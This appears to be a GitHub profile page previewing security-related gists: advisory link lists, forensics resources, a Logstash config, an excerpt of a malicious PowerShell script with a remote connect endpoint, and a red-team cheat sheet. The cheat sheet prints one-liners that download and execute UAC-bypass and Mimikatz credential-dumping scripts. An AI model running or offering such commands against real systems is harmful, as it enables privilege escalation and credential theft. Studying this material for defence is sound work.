Skip to content

Instantly share code, notes, and snippets.

View kevXZY's full-sized avatar
🏠
Working from home

Kevin kevXZY

🏠
Working from home
9 followers · 17 following
  • Paris
View GitHub Profile
@infernoboy
infernoboy / danger.ps1
Created April 8, 2022 23:39
This script was found in a malicious file not being detected by any AV as reported by virustotal
$scriptItem = Get-Item -Path $MyInvocation.MyCommand.Path;
$OS_Major = [System.Environment]::OSVersion.Version.Major.ToString() + "." + [System.Environment]::OSVersion.Version.Minor.ToString();
$EndPointURL = "http://api.private-chatting.com/connect";
$__Version__ = "M_37";
[string]$WorkerEnHandle = [Guid]::NewGuid().ToString();
[System.Threading.EventWaitHandle]$WorkerEn = [System.Threading.EventWaitHandle]::new($true, [System.Threading.EventResetMode]::ManualReset, $WorkerEnHandle);
function XF3a8JO3r5r8G([string] $str) {
return [System.Environment]::ExpandEnvironmentVariables("%" + $str + "%")
}
@SwitHak
SwitHak / 20211210-TLP-WHITE_LOG4J.md
Last active June 28, 2024 12:07
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
@0xmachos
0xmachos / macOS-IR-Forensics.md
Last active July 11, 2024 14:58
If someone wants to learn MacOS IR/forensics what’s the best resource for that?
@ezzeldinadel
ezzeldinadel / What should your SOC check on daily basis for intel?
Created May 31, 2020 17:27
Internet health:
ISC: http://www.isc.org
NetCraft: http://news.netcraft.com/
US-CERT: http://www.US-Cert.gov
General technology and security trends:
@jivoi
jivoi / RedTeam_CheatSheet.ps1
Created July 14, 2018 14:52 — forked from m8sec/RedTeam_CheatSheet.ps1
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@linuxmalaysia
linuxmalaysia / logstash-windows-events.txt
Last active March 15, 2024 13:51
logstash windows events from winlogbeat. Translate common Event ID's and Translate common Event ID's to Quadrants
input {
beats {
id => "01-beats-input"
port => 55044
tags => "winlogbeat"
}
}
@vortexau
vortexau / decompress.ps1
Last active May 13, 2024 07:53
Powershell to decompress DEFLATE data
$base64data = "insert compressed and base64 data here"
$data = [System.Convert]::FromBase64String($base64data)
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
while ($line = $sr.ReadLine()) {
@mubix
mubix / infosec_newbie.md
Last active July 4, 2024 21:11
How to start in Infosec
@unfo
unfo / how-to-oscp-final.md
Last active February 26, 2024 08:39

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@HarmJ0y
HarmJ0y / keepass2john.py
Created June 30, 2016 06:02
Python port of John the Ripper's keepass2john - extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases
#!/usr/bin/python
# Python port of keepass2john from the John the Ripper suite (http://www.openwall.com/john/)
# ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at gmail.com> in March of 2012
# ./keepass2john.c was released under the GNU General Public License
# source keepass2john.c source code from: http://fossies.org/linux/john/src/keepass2john.c
#
# Python port by @harmj0y, GNU General Public License
#